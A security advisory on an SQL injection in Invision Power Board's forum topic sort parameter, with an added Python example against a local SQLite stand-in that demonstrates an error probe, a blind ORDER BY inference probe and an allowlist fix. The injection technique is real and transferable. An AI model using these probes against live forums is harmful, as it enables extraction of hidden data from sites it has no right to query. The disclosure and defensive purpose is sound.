
Invision Power Board SQL Injection Vuln [ All Versions ]

Vendor  : Invision Power Services
URL     : http://www.invisionpower.com
Version : All Versions Up To v2.0 Alpha 3
Risk    : SQL Injection Vulnerability


Invision Power Board (IPB) is a professional forum system that has been
built from the ground up with speed and security in mind, taking advantage
of object oriented code, highly-optimized SQL queries, and the fast PHP
engine. A comprehensive administration control panel is included to help
you keep your board running smoothly. Moderators will also enjoy the full
range of options available to them via built-in tools and the moderator
control panel. Members will appreciate the ability to subscribe to topics,
send private messages, and perform a host of other actions through the user
control panel. It is used by millions of people around the world.


Invision Power Board is vulnerable to SQL injection in the forum topic
listing. All versions up to 2.0 Alpha 3 appear to be affected. The injected
value lands in the sort column of the ORDER BY clause of the topic-listing
query (the position marked [Problem_is_here] in the error message below),
where it is used without any validation. The original advisory gave an
example URL for testing; it is not reproduced in this copy, but the test is
simply to request the topic listing of a forum with a sort column that is
not a valid column name.

If you are vulnerable (you almost certainly are) you will see an error
message similar to the one below, which echoes the full query back to the
browser. The only requirements are to know a valid forum number and to have
read access to that forum (you must be able to view it).

Begin Error Message

mySQL query error: SELECT * from ibf_topics WHERE forum_id=2 and approved=1
and (last_post > 0 OR pinned=1) ORDER BY pinned DESC, [Problem_is_here] DESC
LIMIT 0,15

mySQL error: You have an error in your SQL syntax near '[Problem_is_here]
DESC LIMIT 0,15' at line 1

mySQL error code:

Date: Saturday 13th of December 2003 01:25:30 AM
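The mechanics of the bug and of the fix, as an added Python example that is not part of the advisory and not Invision Power Board's own code. It uses an in-memory SQLite table with constructed rows (SAMPLE_TOPICS) as a stand-in for ibf_topics with a reduced column set, and a hypothetical SORT_COLUMNS allowlist; the functions make_db, vulnerable_query, safe_query, list_topics, error_probe, inference_probe and safe_query_rejects are all invented for the example. Only the shape of the ORDER BY clause is taken from the error message above. It goes one step beyond the advisory's error-message test: even with database errors suppressed, an attacker-chosen ORDER BY expression makes the order of the visible topics depend on a condition evaluated over rows that the WHERE clause hides.

```python
import sqlite3

# Constructed sample data, not from the advisory: three approved topics in
# forum 2 (one of them pinned) plus one unapproved topic that the listing's
# "approved=1" condition is meant to keep invisible.
SAMPLE_TOPICS = [
    # (tid, forum_id, approved, last_post, pinned)
    (1, 2, 1, 3000, 0),
    (2, 2, 1, 1000, 0),
    (3, 2, 1, 2000, 1),
    (4, 2, 0, 9000, 0),  # hidden: approved=0
]

# Hypothetical allowlist mapping a user-supplied sort key to a real column.
SORT_COLUMNS = {"last_post": "last_post", "tid": "tid"}


def make_db():
    """In-memory SQLite stand-in for the ibf_topics table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE ibf_topics (tid INTEGER, forum_id INTEGER, "
               "approved INTEGER, last_post INTEGER, pinned INTEGER)")
    db.executemany("INSERT INTO ibf_topics VALUES (?, ?, ?, ?, ?)", SAMPLE_TOPICS)
    return db


def vulnerable_query(forum_id, sort_key):
    """Same shape as the failing query in the advisory: the sort column is
    pasted into ORDER BY verbatim, which is the injection point."""
    return ("SELECT tid FROM ibf_topics WHERE forum_id=%d AND approved=1 "
            "AND (last_post > 0 OR pinned=1) "
            "ORDER BY pinned DESC, %s DESC LIMIT 0,15" % (int(forum_id), sort_key))


def safe_query(forum_id, sort_key):
    """Hardened form: an identifier cannot be bound as a query parameter, so
    the sort column must come from an allowlist; forum_id is bound normally."""
    column = SORT_COLUMNS.get(sort_key)
    if column is None:
        raise ValueError("unknown sort key: %r" % (sort_key,))
    sql = ("SELECT tid FROM ibf_topics WHERE forum_id=? AND approved=1 "
           "AND (last_post > 0 OR pinned=1) "
           "ORDER BY pinned DESC, %s DESC LIMIT 0,15" % column)
    return sql, (forum_id,)


def safe_query_rejects(forum_id, sort_key):
    """True when the hardened builder refuses the supplied sort key."""
    try:
        safe_query(forum_id, sort_key)
    except ValueError:
        return True
    return False


def list_topics(db, sql, params=()):
    """Run a listing query and return the topic ids in result order."""
    return [row[0] for row in db.execute(sql, params)]


def error_probe(db, forum_id, sort_key):
    """The advisory's vulnerability check: a bogus sort column makes the
    database reject the statement, and IPB echoes the error (and the whole
    query) back. Returns True when the error surfaces."""
    try:
        list_topics(db, vulnerable_query(forum_id, sort_key))
    except sqlite3.OperationalError:  # MySQL raises a syntax error instead
        return True
    return False


def inference_probe(db, forum_id, condition):
    """Beyond the error message: an attacker-chosen expression in ORDER BY
    makes the order of the visible topics depend on a condition evaluated
    over rows the WHERE clause hides. Returns the visible tids in order."""
    expr = "(CASE WHEN (%s) THEN last_post ELSE tid END)" % condition
    return list_topics(db, vulnerable_query(forum_id, expr))


if __name__ == "__main__":
    db = make_db()
    print("error probe:", error_probe(db, 2, "no_such_column"))
    hidden = "(SELECT COUNT(*) FROM ibf_topics WHERE approved=0) > 0"
    print("order when hidden rows exist:", inference_probe(db, 2, hidden))
    print("order when condition is false:", inference_probe(db, 2, "1=0"))
    sql, params = safe_query(2, "last_post")
    print("safe listing:", list_topics(db, sql, params))
    print("allowlist rejects injected expression:",
          safe_query_rejects(2, "(CASE WHEN 1=1 THEN last_post ELSE tid END)"))
```

MySQL reports the bogus column as a syntax error, as in the advisory; SQLite reports an unknown column, but the observable effect, a database error that the application echoes, is the same. The inference probe is the reason the bug matters even on a board that hides database errors: with the sample rows, the visible order is 3, 1, 2 when the condition over the hidden row is true and 3, 2, 1 when it is false, which is one bit of information about data the listing was never supposed to expose. The hardened builder refuses anything that is not an allowlisted key, so the only values that ever reach ORDER BY are column names chosen by the application.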



Invision Power Services have released a fix for this. You can view the forum post:
http://forums.invisionpower.com/index.php?showtopic=106774&st=0&#entry762426
Or go straight to the download page:
http://www.invisionboard.com/download/index.php?act=dl&s=1&id=12&p=1

Whichever fix is applied, the property to verify is that the sort column can
only ever be one of a fixed set of column names chosen by the application. A
column name cannot be passed as a bound query parameter, so escaping the value
is not enough; only an allowlist closes this class of injection. After
patching, repeat the test above: a bogus sort column should produce a normal
listing or a handled error, never an echoed mySQL query.


Credits go to JeiAr of the GulfTech Security Research Team. 

